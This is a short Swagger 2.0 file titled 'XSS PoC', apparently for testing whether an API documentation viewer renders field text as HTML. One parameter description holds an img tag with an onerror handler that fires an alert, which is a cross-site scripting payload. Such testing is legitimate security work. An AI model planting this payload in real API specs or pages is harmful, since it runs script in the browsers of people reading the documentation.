swagger: "2.0"
info:
  title: XSS PoC
  description: API test
  version: "1.0"
host: sinarpagi.com
basePath: /
schemes:
  - https
paths:
  /xss:
    get:
      tags:
        - xss
      summary: Tes endpoint
      parameters:
        - name: foo
          in: query
          required: false
          type: string
          description: |
            <img src="x" onerror="alert('XSS dari parameters.description!')">
      responses:
        '200':
          description: OK
